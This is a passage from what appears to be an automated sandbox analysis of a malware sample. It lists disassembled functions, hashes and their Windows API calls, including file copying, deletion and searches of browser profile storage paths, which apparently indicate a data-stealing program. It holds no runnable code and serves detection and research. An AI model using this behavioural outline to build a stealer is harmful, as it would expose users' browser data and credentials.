                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: a\
                                  • API String ID: 0-215104068
                                  • Opcode ID: 697c0bb98d6cdbfc3e032ce43acf6f698dd2ded557f49e3d31433bd93672b217
                                  • Instruction ID: 6bd3a1433dadba6a4d628dd894128dd56a1e00dbbc63c780f6489026c59d9e82
                                  • Opcode Fuzzy Hash: 697c0bb98d6cdbfc3e032ce43acf6f698dd2ded557f49e3d31433bd93672b217
                                  • Instruction Fuzzy Hash: 184153B3A082149BF7046E28DC8877AB7D6EB94310F2B453DDF848B380E97959058786
                                  Function 005C2AC0 Relevance: .2, Instructions: 157COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c90878c30031b16ecc840cd17d2bdce66754f7d243af9ff8d5129555228e8f2
                                  • Instruction ID: 08a910218a2fe5e00c2a1dadda184cce8f5b5d9593bcf5a00a45ddbccbbe6bf9
                                  • Opcode Fuzzy Hash: 9c90878c30031b16ecc840cd17d2bdce66754f7d243af9ff8d5129555228e8f2
                                  • Instruction Fuzzy Hash: D44158B3E081148BE3049D7DDC443A6B7D7EBD4360F2A873DE99497788EC759D068285
                                  Function 006C885F Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06b1a73584b59e600c24e2128ccfeb5d6d34560b1a1a23d02da1cf2c81b33a2e
                                  • Instruction ID: d2b6ac100c571a721ae407b60c042042259cd2d62af216c78086d71cc97e07c4
                                  • Opcode Fuzzy Hash: 06b1a73584b59e600c24e2128ccfeb5d6d34560b1a1a23d02da1cf2c81b33a2e
                                  • Instruction Fuzzy Hash: 9A41E4B340C609CFD3207E789C45B7ABBE6EB40350F260A2DE5C193608EA715442D787
                                  Function 0073EE46 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ec168789dd87180a067814b8f094cc1dff13cf643dfb1920c54466d853c6160
                                  • Instruction ID: 0d650d642b30afe163f6f9338243edd9dd655132d4f93dea72aca86bb34c6237
                                  • Opcode Fuzzy Hash: 6ec168789dd87180a067814b8f094cc1dff13cf643dfb1920c54466d853c6160
                                  • Instruction Fuzzy Hash: 604136B650D616CFF3446E29DC8163AF7E8EF80310F35492EE5C3962C2DAB918409797
                                  Function 002C85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C8636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 002C86AA
                                  • StrStrA.SHLWAPI(?,011CE088), ref: 002C86CF
                                  • lstrcpyn.KERNEL32(004E93D0,?,00000000), ref: 002C86EE
                                  • lstrlen.KERNEL32(?), ref: 002C8701
                                  • wsprintfA.USER32 ref: 002C8711
                                  • lstrcpy.KERNEL32(?,?), ref: 002C8727
                                  • StrStrA.SHLWAPI(?,011CE028), ref: 002C8754
                                  • lstrcpy.KERNEL32(?,004E93D0), ref: 002C87B4
                                  • StrStrA.SHLWAPI(?,011CE040), ref: 002C87E1
                                  • lstrcpyn.KERNEL32(004E93D0,?,00000000), ref: 002C8800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 15ba252c51e614c63dcfdf7e5fccb7e1328aec88beb8fc7bc1dd37e0b4ee8cef
                                  • Instruction ID: fcd76923d4f210acd7fe9c6b2166df0183ca496b37481c118e5c73cd22bcb2b1
                                  • Opcode Fuzzy Hash: 15ba252c51e614c63dcfdf7e5fccb7e1328aec88beb8fc7bc1dd37e0b4ee8cef
                                  • Instruction Fuzzy Hash: E7F17171910154EFDB10DF64DD88AEAB7B9EF48300F148669F909E7392DB70AE14CBA4
                                  Function 002B1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1F9F
                                  • lstrlen.KERNEL32(011C9248), ref: 002B1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1FE3
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B200E
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B204D
                                  • lstrlen.KERNEL32(002E1794), ref: 002B2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2075
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B2081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B20AC
                                  • lstrlen.KERNEL32(?), ref: 002B20E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2104
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B2112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2139
                                  • lstrlen.KERNEL32(002E1794), ref: 002B214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B216B
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B2177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B21A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B21D4
                                  • lstrlen.KERNEL32(?), ref: 002B21EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B2218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2242
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B227F
                                  • lstrlen.KERNEL32(011CD688), ref: 002B228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B22B1
                                  • lstrcat.KERNEL32(00000000,011CD688), ref: 002B22B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B22F7
                                  • lstrcat.KERNEL32(00000000), ref: 002B2304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002B2356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B23BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 002B23F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002B2444
                                  • FindClose.KERNEL32(00000000), ref: 002B2453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: feb3b3f7469182c4a3390beb503572b155211a1198fab40b72baf81abbf81a7c
                                  • Instruction ID: 27cb1237678ed759ad4d23cc3def398e43ab9599c1c58b29adff5f334d8e70ca
                                  • Opcode Fuzzy Hash: feb3b3f7469182c4a3390beb503572b155211a1198fab40b72baf81abbf81a7c
                                  • Instruction Fuzzy Hash: 78E15E31931746DBDB21EF64DD89AEE77B9AF04380F144064F849AB252DB34DD29CB90
                                  Function 002C6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6445
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002C64AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C64E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: 77e70e663bef21d806bf5fa14ab3f977e34dc4c1db1fb38ec701acc997d57430
                                  • Instruction ID: a3ad2af536fa1fb9fdec17ffbb7599e39fb8aaa443c449d25751ff227cd07a35
                                  • Opcode Fuzzy Hash: 77e70e663bef21d806bf5fa14ab3f977e34dc4c1db1fb38ec701acc997d57430
                                  • Instruction Fuzzy Hash: 50F191709216069FDB21EF64D84DBAEB7B9AF44340F648228F845DB291DB34DC69CF90
                                  Function 002C4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C43A3
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C43D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C43FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 002C4414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 002C443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C44D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C44DF
                                  • lstrlen.KERNEL32(002E1794), ref: 002C44EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4507
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C4513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 002C451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 002C4547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C45A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002C45A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C467B
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C46AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: 914673df60484e69c76fec1c36f3f0bf22c054791b9545ffa89cf27e31789d6e
                                  • Instruction ID: ecf99e35c2dfb5acabd4370d12a4320b2b1c57de777ee55e65c435fcefb3d6a7
                                  • Opcode Fuzzy Hash: 914673df60484e69c76fec1c36f3f0bf22c054791b9545ffa89cf27e31789d6e
                                  • Instruction Fuzzy Hash: 10B17E70A316479BDB21FF74DD99EAF77A9AF10340F644228B885E7252DB30DC258B90
                                  Function 002C57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C57D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002C5804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C5868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C58C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C58D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C58F8
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C5961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5988
                                  • lstrlen.KERNEL32(002E1794), ref: 002C599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C59B9
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C59C5
                                  • lstrlen.KERNEL32(011CD580), ref: 002C59D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C59F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C5A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002C5A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5BB5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C5BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
